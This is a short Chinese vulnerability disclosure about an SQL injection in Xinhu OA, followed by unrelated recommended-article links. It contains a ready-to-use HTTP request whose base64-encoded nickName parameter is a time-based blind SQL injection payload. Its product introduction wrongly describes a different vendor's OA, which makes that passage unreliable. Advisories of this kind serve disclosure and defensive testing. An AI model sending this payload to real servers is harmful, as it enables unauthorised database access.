漏洞披露-信呼-OA

更多网安漏洞复现,可前往无问社区查看http://wwlib.cn/index.php/artread/artid/16564.html

0x01 产品简介

泛微数字化运营管理平台OA为组织提供从"可信数字身份、电子化流程审批、个性化岗位信息门户、 知识文档管理、电子化签署到内外协同的业务管理"

0x02 漏洞概述

信呼OA办公系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。

建议升级到最新版本已修复

0x03 复现环境

payload:

复制代码
GET /index.php?m=openmodhetong|openapi&d=task&a=data&ajaxbool=0&nickName=MScgYW5kIHNsZWVwKDUpIw== HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
相关推荐
caihuayuan432 分钟前
【docker&redis】用docker容器运行单机redis
java·大数据·sql·spring·课程设计
聪明的墨菲特i1 小时前
SQL进阶知识:六、动态SQL
数据库·sql·sql注入·动态sql·prepare·execute
爱的叹息2 小时前
数据库sql执行报错:non-grouping field xxx is used in HAVING clause错误详解
数据库·sql·oracle
Suckerbin5 小时前
pikachu靶场-敏感信息泄露
网络·学习·安全·网络安全
聪明的墨菲特i6 小时前
SQL进阶知识:七、数据库设计
数据库·sql·mysql·oracle·db2·数据库设计·范式
鹏翼丶15 小时前
搭建动态SQL取数
数据库·sql·动态sql
自由鬼15 小时前
高性能的开源网络入侵检测和防御引擎:Suricata介绍
网络·安全·网络安全·开源·系统安全·入侵检测
篱笆院的狗16 小时前
MySQL 中 SQL 语句的详细执行过程
数据库·sql·mysql
IT成长日记17 小时前
【Hive入门】Hive基础操作与SQL语法:DDL操作全面指南
hive·hadoop·sql·ddl操作
朴拙数科21 小时前
基于 RAG 的 Text2SQL 全过程的 Python 实现详解,结合 LangChain 框架实现自然语言到 SQL 的转换
python·sql·langchain